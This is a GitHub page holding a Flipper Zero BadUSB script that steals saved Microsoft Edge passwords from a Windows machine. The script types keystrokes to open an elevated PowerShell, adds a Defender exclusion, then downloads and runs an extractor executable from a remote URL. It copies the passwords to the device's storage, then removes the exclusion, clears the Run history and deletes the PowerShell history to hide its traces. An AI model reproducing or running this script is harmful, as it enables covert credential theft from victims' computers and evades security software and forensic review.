-
Notifications
You must be signed in to change notification settings - Fork 1
/
edgePassword_ms.js
82 lines (68 loc) · 2.89 KB
/
edgePassword_ms.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
// Requirements
let badusb = require("badusb");
let usbdisk = require("usbdisk");
let storage = require("storage");
// Mass storage details
let image = "/ext/apps_data/mass_storage/edge_loot.img";
let size = 8 * 1024 * 1024; // 8 MB
// PowerShell script
let script = [
"$currentDirectory = Get-Location;",
"Add-MpPreference -ExclusionPath $currentDirectory.Path;",
"$Date = Get-Date -Format yyyy-MM-dd;",//Get Date
"$Time = Get-Date -Format hh-mm-ss;",//Get Time
"$exeUrl = 'https://github.com/RiadZX/FlipperPasswordExtractor/raw/master/build/edge.exe';", // URL of the executable
"$exePath = '.\\edge.exe';", // Path where the executable will be saved in the current directory
"if (-not (Test-Path -Path $exePath)) {Invoke-WebRequest -Uri $exeUrl -OutFile $exePath;}", // Download the executable if it doesn't exist
"$commandOutput = & \"$exePath\" | Out-String;", // Execute the command and capture the output
"$fileName = '.\\edge.txt';", //Output filename
"$commandOutput | Out-File -FilePath $fileName;", // Save the output to a file
];
// Script crawler
let command = "";
for (let i = 0; i < script.length; i++) {
command += script[i];
}
// Check if mass storage already exists
print("Checking for Image...");
if (storage.exists(image)) {
print("Storage Exists.");
} else {
print("Creating Storage...");
usbdisk.createImage(image, size);
}
// VID & PID as HID
badusb.setup({
vid: 0xAAAA,
pid: 0xBBBB,
mfr_name: "Flipper",
prod_name: "Zero",
layout_path: "/ext/badusb/assets/layouts/en-US.kl"
});
print("Waiting for connection");
while (!badusb.isConnected()) {
delay(1000);
}
badusb.press("GUI", "r"); // Open Run
delay(300);
badusb.println('powershell -Command "Start-Process powershell -Verb RunAs"');
delay(1000);
badusb.press("LEFT");
delay(500);
badusb.press("ENTER");
delay(2000);
print("Running payload");
badusb.println(command, 1);//Run Script Crawler
delay(9000)
badusb.println("Start-Sleep 8; $DriveLetter = Get-Disk -FriendlyName 'Flipper Mass Storage' | Get-Partition | Get-Volume | Select-Object -ExpandProperty DriveLetter; New-Item -ItemType Directory -Force -Path ${DriveLetter}:\\${Date}\\; Move-Item -Path edge.txt -Destination ${DriveLetter}:\\${Date}\\${env:computername}_${Time}.txt; Remove-Item edge.exe; $currentDirectory = Get-Location; Remove-MpPreference -ExclusionPath $currentDirectory.Path; reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f; Remove-Item (Get-PSReadlineOption).HistorySavePath -ErrorAction SilentlyContinue; exit")
badusb.quit();
delay(2000);
usbdisk.start(image);//Open MassStorage Folder
print("Please wait until powershell closes to eject");
// Wait for user to eject the mass storage
while (!usbdisk.wasEjected()) {
delay(1000);
}
// Stop the script
usbdisk.stop();
print("Done");